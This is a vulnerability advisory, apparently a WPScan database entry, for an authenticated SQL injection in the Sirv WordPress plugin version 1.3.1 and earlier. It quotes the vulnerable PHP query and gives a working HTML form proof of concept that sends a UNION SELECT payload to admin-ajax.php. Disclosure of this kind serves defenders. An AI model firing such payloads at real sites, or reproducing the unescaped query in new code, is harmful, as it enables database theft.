Sirv <= 1.3.1 – Authenticated SQL Injection | CVE 2016-10950 | Plugin Vulnerabilities

Description

$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user.

$id = $_POST['row_id'];

$row = $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);

$row['images'] = unserialize($row['images']);

echo json_encode($row);

Proof of Concept

<form method="post" action="http://target/wp-admin/admin-ajax.php">
    <input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
    <input type="text" name="action" value="sirv_get_row_by_id">
    <input type="submit" value="Send">
</form>

Affects Plugins

Fixed in 1.3.2

References

CVE

Exploitdb

URL

https://lenonleite.com.br/en/2016/11/10/sirv-1-3-1-plugin-for-wordpress/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/

Submitter twitter

Verified

No

WPVDB ID

55995fe7-45e6-4c75-88b6-d89b2a3c9725

Timeline

Publicly Published

2016-11-10 (about 9 years ago)

Added

2016-11-21 (about 9 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2023-10-30

Title

Up down image slideshow gallery < 12.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2021-10-07

Title

Unlimited PopUps <= 4.5.3 - Author+ SQL Injection

Published

2024-11-04

Title

Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons < 24.0.4 - Unauthenticated SQL Injection

Published

2025-09-05

Title

ELEX WooCommerce Google Shopping (Google Product Feed) < 1.4.4 - Authenticated (Admin+) SQL Inejction

Published

2014-08-01

Title

BuddyPress 1.7.1 - Multiple SQL Injections